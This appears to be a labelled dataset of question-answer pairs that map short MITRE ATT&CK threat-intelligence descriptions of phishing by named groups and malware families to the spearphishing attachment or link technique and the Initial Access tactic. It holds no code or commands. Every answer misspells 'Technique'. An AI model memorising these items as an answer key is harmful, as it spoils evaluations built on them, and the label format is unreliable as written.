+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has sent spearphishing emails with malicious hta file attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has sent e-mails with malicious attachments often crafted for specific targets.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has sent phishing emails with malicious attachments for initial access including MS Word documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used spearphishing emails with malicious attachments to initially compromise victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has sent spearphishing attachments with password protected ZIP files.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has sent phishing emails with malicious Microsoft Word attachments to victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used e-mail to deliver malicious attachments to victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has delivered payloads via spearphishing attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has sent emails to intended victims with malicious MS Word and Excel attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 has sent emails with malicious Microsoft Office documents attached.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The primary delivered mechanism for Agent Tesla is through email phishing messages.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has been distributed to victims through malicious e-mail attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth has been delivered via malicious e-mail attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook is delivered via a malicious Word document inside a zip file.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has been delivered as malicious email attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has gained execution through luring users into opening malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has been delivered by sending victims a phishing email containing a malicious .docx file.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has been delivered to victim's machines through malicious e-mail attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot has been distributed within a malicious Excel attachment via spearphishing emails.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can be distributed through emails with malicious attachments from a spoofed email address.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has been distributed via spearphishing emails containing archive attachments, with file types such as .iso, .zip, .img, .dmg, and .tar, as well as through malicious documents.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has been delivered via spearphishing emails that contain a malicious zip file.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been delivered by phishing emails containing attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout has been distributed via spearphishing as an email attachment.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been distributed via spearphishing as an email attachment.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has been delivered via phishing emails with malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has been delivered via phishing e-mails with malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali has been delivered as malicious e-mail attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has been distributed via spearphishing emails with malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has been delivered via spearphishing campaigns through a malicious Word document.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK has been delivered to victims as a malicious email attachment.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown has been distributed through malicious e-mail attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has been delivered to victims via emails with malicious HTML attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has been spread via e-mail campaigns utilizing malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has been delivered via spearsphishing emails.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel has been distributed as a malicious attachment within a spearphishing email.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT was distributed via malicious Word documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has been delivered via spearphishing attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has spread through emails with malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has been distributed via malicious e-mail attachments including MS Word Documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has been delivered via spearphishing attachments disguised as PDF documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has been distributed through spearphishing emails with malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has been distributed in e-mails with malicious Excel or Word documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has been distributed via spearphishing campaigns containing malicious Mircrosoft Word documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has been distributed as malicious attachments within spearphishing emails.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has been delivered to victims through malicious e-mail attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has been delivered through spearphishing emails.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle has been distributed via a malicious Word document within a spearphishing email.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has been delivered via spearphishing e-mails with password protected ZIP files.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has been distributed as a malicious attachment within an email.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has been delivered via malicious Word documents and archive files.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors sent phishing emails with unique malicious links, likely for tracking victim clicks.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors sent phishing emails to victims that contained a malicious link.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has sent spearphishing emails containing hyperlinks to malicious files.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has sent spearphishing emails containing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has sent spearphishing emails containing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has sent spearphishing emails containing links to .hta files.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 leveraged spearphishing emails with malicious links to initially compromise victims.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has sent emails with URLs pointing to malicious documents.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has sent malicious links to victims through email campaigns.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has sent spearphishing emails containing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has sent spearphishing emails containing a link to a zip file hosted on Google Drive.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has used spearphishing emails (often sent from compromised accounts) containing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has conducted broad phishing campaigns using malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has distributed targeted emails containing links to malicious documents with embedded macros.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has sent malicious links to victims via email.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has sent spearphishing emails containing a malicious Dropbox download link.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has sent phishing emails that contain a link to an external server with ZIP and RAR archives.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mofang delivered spearphishing emails with malicious links included.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has sent phishing emails with malicious links included.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has sent targeted spearphishing e-mails with malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has delivered malicious links to their intended targets.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has sent victims emails containing links to compromised websites.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has sent spearphising emails with malicious links to potential victims.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has used spearphishing with links to deliver files with exploits to initial victims.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has crafted phishing emails containing malicious hyperlinks.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has sent e-mails with malicious links often crafted for specific targets.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used spearphishing e-mails with malicious links to deliver malware.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has sent spearphishing emails containing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has embedded links to malicious downloads in e-mails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has sent spearphishing emails with links to harvest credentials and deliver malware.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used malicious links in e-mails to deliver malware.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can send ""consent phishing"" emails containing malicious links designed to steal users’ access tokens.","Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has been distributed via spearphishing link.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has been spread via emails with embedded malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has been spread through e-mail campaigns with malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate is distributed in phishing emails containing links to distribute malicious VBS or MSI files. DarkGate uses applications such as Microsoft Teams for distributing links to payloads.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been delivered by phishing emails containing links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has been spread via malicious links embedded in e-mails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader has been spread in phishing campaigns using malicious web links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has been delivered via phishing emails which contained malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali has been delivered via malicious links embedded in e-mails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has been distributed as a malicious link within an email.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown has been distributed via e-mails containing a malicious link.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz has been spread through malicious links embedded in e-mails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has been spread via malicious links embedded in emails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has been spread via e-mail campaigns utilizing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel has been distributed through malicious links contained within spearphishing emails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has been delivered via spearphishing emails which contained malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has spread through emails with malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has been distributed through malicious links contained within spearphishing emails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has been delivered to victims through e-mail links to malicious files.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has been spread via emails containing malicious links.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette has been distributed via emails containing a malicious link that appears to be a PDF document.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has been distributed through phishing emails containing a malicious URL.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has been delivered via malicious links in phishing e-mails.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has been delivered via malicious links in e-mail.,"Tecnique: T1566.002 Phishing: Spearphishing Link, Tactic: TA0001 Initial Access"
